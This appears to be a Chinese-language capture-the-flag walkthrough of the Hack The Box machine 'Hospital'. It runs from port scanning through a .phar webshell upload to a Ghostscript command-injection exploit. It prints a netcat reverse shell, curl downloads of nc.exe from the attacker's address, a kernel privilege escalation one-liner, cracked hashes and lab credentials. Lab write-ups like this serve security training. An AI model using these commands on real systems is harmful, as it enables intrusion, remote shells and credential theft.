HTB : Hospital
Tags: Medium Date: 2023年11月24日 Status: Yes
Port Scanning
nmap --min-rate 10000-p-10.10.11.241
StartingNmap7.94SVN( https://nmap.org ) at 2023-11-2416:33 CST
Nmap scan report for10.10.11.241
Host is up (0.000045s latency).
Not shown:65527 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
Nmapdone:1 IP address (1 host up) scanned in20.04 seconds
Web Enumeration
访问443端口 是一个邮件后台
访问8080端口
存在弱口令 admin 123456
登录后有文件上传点
扫描目录 发现上传路径 /uploads
测试文件上传
发现上传 jpg文件可以 上传php文件就不可以 (访问不到)可以上传phar文件
https://github.com/flozz/p0wny-shell
将这个shell上传为.phar为后缀的文件 之后访问 执行命令反弹shell
rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|sh -i 2>&1|nc 10.10.16.69002>/tmp/f
找到数据库信息
define('DB_SERVER','localhost');
define('DB_USERNAME','root');
define('DB_PASSWORD','my$qls3rv1c3!');
define('DB_NAME','hospital');
进行提权 uname -a查看版本 5.19 google搜索ubuntu 5.19.0 exploit 发现存在本地权限提升漏洞
GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
【漏洞复现】CVE-2023-2640 Ubuntu本地权限提升-腾讯云开发者社区-腾讯云
Foothold (user.txt)
输入poc 发现存在漏洞
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;"&& u/python3 -c 'import os;os.setuid(0);os.system("id")'
exp如下
GitHub - g1vi/CVE-2023-2640-CVE-2023-32629: GameOver(lay) Ubuntu Privilege Escalation
发现并没有flag 应该是不在这一台机器里 翻一翻找找信息
在查看shadow文件的时候发现了 hash
复制下来爆破
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
hashcat hash.txt /usr/share/wordlists/rockyou.txt
破解出密码
得到一组凭据 drwilliams:qwe123!@#
登录443端口的webmail试试
进去发现一封邮件
DearLucy,
I wanted to remind you that the project for lighter, cheaper and
environmentally friendly needles is still ongoing 💉.You are the one in
charge of providing me with the designs for these so that I can take
them to the 3D printing department and start producing them right away.
Please make the design in an ".eps" file format so that it can be well
visualized with GhostScript.
Best regards,
ChrisBrown.
😃
亲爱的露西:
我想提醒你,这个项目是为了更轻、更便宜和。
环保针头仍在进行中的💉。
你是里面的那个。
负责为我提供这些的设计,这样我就可以。
把它们送到3D打印部门,立即开始生产。
请将设计制作成“.eps”文件格式,这样才能很好地使用。
使用GhostScript可视化。
诚挚的问候,。
克里斯·布朗。
😃
google搜索 ghostscript eps exploit
CVE-2023-36664: Command injection with Ghostscript PoC + exploit - vsociety
https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
发送邮件 传附件 上传nc
python CVE_2023_36664_exploit.py --inject --payload "curl http://10.10.16.6:8888/nc.exe -o nc.exe"--filename file.eps
使用nc反弹shell
python CVE_2023_36664_exploit.py --inject --payload "nc.exe 10.10.16.6 4444 -e cmd.exe"--filename file.eps
获得user.txt
da196aafb7c6cfcd2d2655258ef61edc
Priv Escalation (root.txt)
在ghostscript.bat中发现账号密码 hospitaldrbrown:chr!$br0wn
@echo off
set filename=%~1
powershell -command"$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospitaldrbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:Program` Filesgsgs10.01.1bingswin64c.exe" -dNOSAFER "C:Usersdrbrown.HOSPITALDownloads%filename%" }"
rpcclient -U "hospitaldrbrown"10.10.11.241
查询信息 发现Administrator 与 Guest内容共享
找到网站根目录 使用icacls命令查看权限 发现是nt权限 也就是说 我们在此处上传webshell 那么webshell的权限就是 system权限
上传webshell
curl http://10.10.16.6:8888/shell.phar -o shell.php
成功访问system权限的webshell
53ae2d315279a03158e59b381b79f799
原文始发于微信公众号(SSP安全研究):HTB : Hospital
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论